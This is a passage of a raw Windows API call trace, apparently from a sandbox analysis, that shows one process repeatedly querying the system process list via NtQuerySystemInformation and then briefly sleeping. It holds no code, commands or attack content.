ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xef68) returned 0x0 [0084.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xef68) returned 0x0 [0084.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xef68) returned 0x0 [0084.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xef68) returned 0x0 [0084.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xef68) returned 0x0 [0084.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xef68) returned 0x0 [0084.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xef68) returned 0x0 [0084.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xef68) returned 0x0 [0084.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xef68) returned 0x0 [0084.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xef68) returned 0x0 [0084.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xef68) returned 0x0 [0084.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xef68) returned 0x0 [0084.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xef68) returned 0x0 [0084.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xefa8) returned 0x0 [0084.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0084.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xf078) returned 0x0 [0086.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xe940) returned 0x0 [0086.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xe940) returned 0x0 [0086.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xe940) returned 0x0 [0086.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xe940) returned 0x0 [0086.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xe940) returned 0x0 [0086.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xe940) returned 0x0 [0086.430] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0090.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x114f0) returned 0x0 [0090.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x114f0) returned 0x0 [0090.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x114f0) returned 0x0 [0090.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x114f0) returned 0x0 [0090.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x114f0) returned 0x0 [0090.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x114f0) returned 0x0 [0090.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x114f0) returned 0x0 [0090.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x114f0) returned 0x0 [0090.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x114f0) returned 0x0 [0090.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x114f0) returned 0x0 [0090.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0090.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0090.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0090.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0090.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0090.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0090.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0090.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0090.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x11470) returned 0x0 [0090.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, 